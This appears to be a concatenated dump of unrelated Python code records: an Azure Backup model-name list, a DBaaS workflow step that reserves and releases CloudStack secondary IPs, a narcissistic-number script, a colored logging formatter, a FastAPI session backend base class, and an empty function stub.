'BackupResourceVaultConfigResource',
'BackupStatusRequest',
'BackupStatusResponse',
'ClientDiscoveryDisplay',
'ClientDiscoveryForLogSpecification',
'ClientDiscoveryForProperties',
'ClientDiscoveryForServiceSpecification',
'ClientDiscoveryResponse',
'ClientDiscoveryValueForSingleApi',
'ClientScriptForConnect',
'CloudErrorBody',
'ContainerIdentityInfo',
'DPMContainerExtendedInfo',
'DPMProtectedItem',
'DPMProtectedItemExtendedInfo',
'DailyRetentionFormat',
'DailyRetentionSchedule',
'DailySchedule',
'Day',
'DiskExclusionProperties',
'DiskInformation',
'DistributedNodesInfo',
'DpmBackupEngine',
'DpmContainer',
'DpmErrorInfo',
'DpmJob',
'DpmJobExtendedInfo',
'DpmJobTaskDetails',
'EncryptionDetails',
'ErrorAdditionalInfo',
'ErrorDetail',
'ExportJobsOperationResultInfo',
'ExtendedProperties',
'FeatureSupportRequest',
'GenericContainer',
'GenericContainerExtendedInfo',
'GenericProtectedItem',
'GenericProtectionPolicy',
'GenericRecoveryPoint',
'GetProtectedItemQueryObject',
'HourlySchedule',
'ILRRequest',
'ILRRequestResource',
'IaaSVMContainer',
'IaaSVMProtectableItem',
'IaasVMBackupRequest',
'IaasVMILRRegistrationRequest',
'IaasVMRecoveryPoint',
'IaasVMRestoreRequest',
'IaasVMRestoreWithRehydrationRequest',
'IdentityBasedRestoreDetails',
'IdentityInfo',
'InquiryInfo',
'InquiryValidation',
'InstantItemRecoveryTarget',
'InstantRPAdditionalDetails',
'Job',
'JobQueryObject',
'JobResource',
'JobResourceList',
'KEKDetails',
'KPIResourceHealthDetails',
'KeyAndSecretDetails',
'ListRecoveryPointsRecommendedForMoveRequest',
'LogSchedulePolicy',
'LongTermRetentionPolicy',
'LongTermSchedulePolicy',
'MABContainerHealthDetails',
'MabContainer',
'MabContainerExtendedInfo',
'MabErrorInfo',
'MabFileFolderProtectedItem',
'MabFileFolderProtectedItemExtendedInfo',
'MabJob',
'MabJobExtendedInfo',
'MabJobTaskDetails',
'MabProtectionPolicy',
'MonthlyRetentionSchedule',
'MoveRPAcrossTiersRequest',
'NameInfo',
'NewErrorResponse',
'NewErrorResponseError',
'OperationResultInfo',
'OperationResultInfoBase',
'OperationResultInfoBaseResource',
'OperationStatus',
'OperationStatusError',
'OperationStatusExtendedInfo',
'OperationStatusJobExtendedInfo',
'OperationStatusJobsExtendedInfo',
'OperationStatusProvisionILRExtendedInfo',
'OperationStatusValidateOperationExtendedInfo',
'OperationWorkerResponse',
'PointInTimeRange',
'PreBackupValidation',
'PreValidateEnableBackupRequest',
'PreValidateEnableBackupResponse',
'PrepareDataMoveRequest',
'PrepareDataMoveResponse',
'PrivateEndpoint',
'PrivateEndpointConnection',
'PrivateEndpointConnectionResource',
'PrivateLinkServiceConnectionState',
'ProtectableContainer',
'ProtectableContainerResource',
'ProtectableContainerResourceList',
'ProtectedItem',
'ProtectedItemQueryObject',
'ProtectedItemResource',
'ProtectedItemResourceList',
'ProtectionContainer',
'ProtectionContainerResource',
'ProtectionContainerResourceList',
'ProtectionIntent',
'ProtectionIntentQueryObject',
'ProtectionIntentResource',
'ProtectionIntentResourceList',
'ProtectionPolicy',
'ProtectionPolicyQueryObject',
'ProtectionPolicyResource',
'ProtectionPolicyResourceList',
'RecoveryPoint',
'RecoveryPointDiskConfiguration',
'RecoveryPointMoveReadinessInfo',
'RecoveryPointRehydrationInfo',
'RecoveryPointResource',
'RecoveryPointResourceList',
'RecoveryPointTierInformation',
'RecoveryPointTierInformationV2',
'Resource',
'ResourceGuardOperationDetail',
'ResourceGuardProxyBase',
'ResourceGuardProxyBaseResource',
'ResourceGuardProxyBaseResourceList',
'ResourceHealthDetails',
'ResourceList',
'RestoreFileSpecs',
'RestoreRequest',
'RestoreRequestResource',
'RetentionDuration',
'RetentionPolicy',
'SQLDataDirectory',
'SQLDataDirectoryMapping',
'SchedulePolicy',
'SecurityPinBase',
'Settings',
'SimpleRetentionPolicy',
'SimpleSchedulePolicy',
'SimpleSchedulePolicyV2',
'SubProtectionPolicy',
'TargetAFSRestoreInfo',
'TargetRestoreInfo',
'TieringPolicy',
'TokenInformation',
'TriggerDataMoveRequest',
'UnlockDeleteRequest',
'UnlockDeleteResponse',
'ValidateIaasVMRestoreOperationRequest',
'ValidateOperationRequest',
'ValidateOperationResponse',
'ValidateOperationsResponse',
'ValidateRestoreOperationRequest',
'VaultJob',
'VaultJobErrorInfo',
'VaultJobExtendedInfo',
'VaultStorageConfigOperationResultResponse',
'WeeklyRetentionFormat',
'WeeklyRetentionSchedule',
'WeeklySchedule',
'WorkloadInquiryDetails',
'WorkloadItem',
'WorkloadItemResource',
'WorkloadItemResourceList',
'WorkloadProtectableItem',
'WorkloadProtectableItemResource',
'WorkloadProtectableItemResourceList',
'YearlyRetentionSchedule',
'AcquireStorageAccountLock',
'AzureFileShareType',
'BackupEngineType',
'BackupItemType',
'BackupManagementType',
'BackupType',
'ContainerType',
'CopyOptions',
'CreateMode',
'DataMoveLevel',
'DataSourceType',
'DayOfWeek',
'DedupState',
'EncryptionAtRestType',
'EnhancedSecurityState',
'FabricName',
'HealthState',
'HealthStatus',
'HttpStatusCode',
'IAASVMPolicyType',
'InfrastructureEncryptionState',
'InquiryStatus',
'IntentItemType',
'JobOperationType',
'JobStatus',
'JobSupportedAction',
'LastBackupStatus',
'LastUpdateStatus',
'MabServerType',
'MonthOfYear',
'OperationStatusValues',
'OperationType',
'OverwriteOptions',
'PolicyType',
'PrivateEndpointConnectionStatus',
'ProtectedItemHealthStatus',
'ProtectedItemState',
'ProtectionIntentItemType',
'ProtectionState',
'ProtectionStatus',
'ProvisioningState',
'RecoveryMode',
'RecoveryPointTierStatus',
'RecoveryPointTierType',
'RecoveryType',
'RehydrationPriority',
'ResourceHealthStatus',
'RestorePointQueryType',
'RestorePointType',
'RestoreRequestType',
'RetentionDurationType',
'RetentionScheduleFormat',
'SQLDataDirectoryType',
'ScheduleRunType',
'SoftDeleteFeatureState',
'StorageType',
'StorageTypeState',
'SupportStatus',
'TieringMode',
'Type',
'UsagesUnit',
'ValidationStatus',
'WeekOfMonth',
'WorkloadItemType',
'WorkloadType',
'XcoolState',
]
| StarcoderdataPython |
1772542 | # -*- coding: utf-8 -*-
import logging
from dbaas_credentials.models import CredentialType
from util import get_credentials_for
from util import full_stack
from dbaas_cloudstack.models import HostAttr
from dbaas_cloudstack.models import DatabaseInfraAttr
from dbaas_cloudstack.provider import CloudStackProvider
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0010
LOG = logging.getLogger(__name__)
class CreateSecondaryIp(BaseStep):
def __unicode__(self):
return "Allocating secondary ips..."
def do(self, workflow_dict):
try:
if 'target_hosts' not in workflow_dict:
return False
if len(workflow_dict['target_hosts']) == 1:
return True
cs_credentials = get_credentials_for(
environment=workflow_dict['target_environment'],
credential_type=CredentialType.CLOUDSTACK)
LOG.info("Get credential fot network api...")
networkapi_credentials = get_credentials_for(
environment=workflow_dict['target_environment'],
credential_type=CredentialType.NETWORKAPI)
cs_provider = CloudStackProvider(credentials=cs_credentials,
networkapi_credentials=networkapi_credentials)
if not cs_provider:
raise Exception("Could not create CloudStackProvider object")
return False
workflow_dict['target_secondary_ips'] = []
networkapi_equipment_id = workflow_dict[
'source_secondary_ips'][0].networkapi_equipment_id
if not networkapi_equipment_id:
raise Exception("Could not register networkapi equipment")
return False
for index, host in enumerate(workflow_dict['target_hosts']):
LOG.info("Creating Secondary ips...")
host_attr = HostAttr.objects.get(host=host)
reserved_ip = cs_provider.reserve_ip(
project_id=cs_credentials.project,
vm_id=host_attr.vm_id)
if not reserved_ip:
return False
databaseinfraattr = DatabaseInfraAttr()
databaseinfraattr.ip = reserved_ip['secondary_ip']
if index == 0:
databaseinfraattr.is_write = True
ip_desc = 'Write IP'
else:
databaseinfraattr.is_write = False
ip_desc = 'Read IP'
networkapi_ip_id = cs_provider.register_networkapi_ip(equipment_id=networkapi_equipment_id,
ip=reserved_ip[
'secondary_ip'],
ip_desc=ip_desc)
databaseinfraattr.cs_ip_id = reserved_ip['cs_ip_id']
databaseinfraattr.networkapi_equipment_id = networkapi_equipment_id
databaseinfraattr.networkapi_ip_id = networkapi_ip_id
databaseinfraattr.databaseinfra = workflow_dict[
'databaseinfra']
databaseinfraattr.save()
old_ip = workflow_dict['source_secondary_ips'][index]
old_ip.equivalent_dbinfraattr = databaseinfraattr
old_ip.save()
workflow_dict['target_secondary_ips'].append(databaseinfraattr)
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0010)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
    def undo(self, workflow_dict):
        """Roll back the secondary-IP provisioning performed by ``do``.

        Selects the DatabaseInfraAttr rows that look newly created for this
        infra (``equivalent_dbinfraattr`` still ``None`` and not among the
        original source secondary IPs) and, for each one, unregisters the
        NetworkAPI IP, releases the CloudStack secondary IP and deletes the
        row.

        Returns ``True`` on success, ``False`` on any failure; unexpected
        exceptions append error code DBAAS_0010 and a traceback to
        ``workflow_dict['exceptions']`` instead of propagating.
        """
        LOG.info("Running undo...")
        try:
            # Without the infra reference there is nothing we can clean up.
            if 'databaseinfra' not in workflow_dict:
                LOG.info(
                    "We could not find a databaseinfra inside the workflow_dict")
                return False
            # IDs of the ORIGINAL (source) secondary IPs -- these must be
            # preserved; only the newly created target rows are rolled back.
            source_secondary_ip_ids = [
                secondary_ip.id for secondary_ip in workflow_dict['source_secondary_ips']]
            # Candidate rows for deletion: attrs of this infra never linked
            # as an equivalent, excluding the source IPs themselves.
            databaseinfraattr = DatabaseInfraAttr.objects.filter(
                databaseinfra=workflow_dict['databaseinfra'],
                equivalent_dbinfraattr=None).exclude(id__in=source_secondary_ip_ids)
            LOG.info("databaseinfraattr: {}".format(databaseinfraattr))
            LOG.info("old infra ip: {}".format(
                workflow_dict['source_secondary_ips']))
            cs_credentials = get_credentials_for(
                environment=workflow_dict['target_environment'],
                credential_type=CredentialType.CLOUDSTACK)
            networkapi_credentials = get_credentials_for(
                environment=workflow_dict['target_environment'],
                credential_type=CredentialType.NETWORKAPI)
            cs_provider = CloudStackProvider(credentials=cs_credentials,
                                             networkapi_credentials=networkapi_credentials)
            for infra_attr in databaseinfraattr:
                networkapi_equipment_id = infra_attr.networkapi_equipment_id
                networkapi_ip_id = infra_attr.networkapi_ip_id
                # Teardown order matters: NetworkAPI registration first (if
                # any), then the CloudStack IP, and only then the DB row.
                if networkapi_ip_id:
                    LOG.info("Removing network api IP for %s" %
                             networkapi_ip_id)
                    if not cs_provider.remove_networkapi_ip(equipment_id=networkapi_equipment_id,
                                                            ip_id=networkapi_ip_id):
                        return False
                LOG.info("Removing secondary_ip for %s" % infra_attr.cs_ip_id)
                if not cs_provider.remove_secondary_ips(infra_attr.cs_ip_id):
                    return False
                LOG.info("Secondary ip deleted!")
                infra_attr.delete()
                LOG.info("Databaseinfraattr deleted!")
            return True
        except Exception:
            # Best-effort rollback: report the failure to the workflow
            # engine via workflow_dict rather than raising.
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0010)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False
| StarcoderdataPython |
3362757 | <reponame>xiaoandx/learningCode
# Collect every three-digit narcissistic (Armstrong) number: a number equal
# to the sum of the cubes of its digits, e.g. 153 == 1**3 + 5**3 + 3**3.
numberList = []
for number in range(100, 1000):
    hundreds = number // 100        # hundreds digit
    tens = (number // 10) % 10      # tens digit
    ones = number % 10              # ones digit (simplified from (n % 100) % 10)
    if hundreds ** 3 + tens ** 3 + ones ** 3 == number:
        numberList.append(number)
# Print the matches on one line, comma-separated.
print("所有的3位水仙花数:", end=" ")
print(", ".join(str(i) for i in numberList))
| StarcoderdataPython |
34267 | <gh_stars>1-10
# Credits to https://stackoverflow.com/a/56944256/9470078
# I wanted a colored logger without dependencies, so here it is!
import logging
class ColoredFormatter(logging.Formatter):
    """Logging formatter that wraps each record in an ANSI color escape
    sequence chosen by the record's level. No third-party dependencies.

    Credits: https://stackoverflow.com/a/56944256/9470078
    """

    # ANSI SGR escape sequences for each severity color.
    grey = "\x1b[38;20m"
    yellow = "\x1b[33;20m"
    red = "\x1b[31;20m"
    blue = "\x1b[34;20m"
    bold_red = "\x1b[31;1m"
    reset = "\x1b[0m"
    # Base layout shared by every level. Renamed from ``format`` so the
    # string no longer shadows the builtin and collides with the ``format``
    # method (which previously clobbered this attribute at class creation).
    _base_fmt = "%(name)s: %(levelname)s - %(message)s"

    # Level -> fully colored layout string.
    FORMATS = {
        logging.DEBUG: grey + _base_fmt + reset,
        logging.INFO: blue + _base_fmt + reset,
        logging.WARNING: yellow + _base_fmt + reset,
        logging.ERROR: red + _base_fmt + reset,
        logging.CRITICAL: bold_red + _base_fmt + reset,
    }

    def format(self, record):
        """Render *record* using the colored layout for its level.

        Unknown/custom levels fall through to ``logging.Formatter(None)``,
        i.e. the plain ``%(message)s`` default (same as the original code).
        """
        log_fmt = self.FORMATS.get(record.levelno)
        formatter = logging.Formatter(log_fmt)
        return formatter.format(record)
| StarcoderdataPython |
4814526 | <filename>fastapi_sessions/backends/session_backend.py<gh_stars>10-100
"""Generic backend code."""
from abc import ABC, abstractmethod
from typing import Generic, Optional, TypeVar
from fastapi_sessions.frontends.session_frontend import ID
from pydantic.main import BaseModel
SessionModel = TypeVar("SessionModel", bound=BaseModel)
class BackendError(Exception):
    """Error that is thrown by backends."""
    # (Redundant ``pass`` removed: the docstring is a sufficient class body.)
class SessionBackend(ABC, Generic[ID, SessionModel]):
    """Abstract class that defines methods for interacting with session data.

    Generic over ``ID`` (the session-identifier type supplied by the
    frontend) and ``SessionModel`` (a pydantic model holding the session
    payload). Concrete storage backends implement the four async CRUD
    coroutines below.
    """
    @abstractmethod
    async def create(self, session_id: ID, data: SessionModel) -> None:
        """Create a new session.

        Stores *data* under *session_id* in the backend's storage.
        """
        raise NotImplementedError()
    @abstractmethod
    async def read(self, session_id: ID) -> Optional[SessionModel]:
        """Read session data from the storage.

        Per the return annotation a missing session may yield ``None`` --
        confirm exact missing-key behavior with the concrete backend.
        """
        raise NotImplementedError()
    @abstractmethod
    async def update(self, session_id: ID, data: SessionModel) -> None:
        """Update session data to the storage."""
        raise NotImplementedError()
    @abstractmethod
    async def delete(self, session_id: ID) -> None:
        """Remove session data from the storage."""
        raise NotImplementedError()
3297232 | <reponame>vijaykumawat256/Prompt-Summarization
def two_decimal_places(n):
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.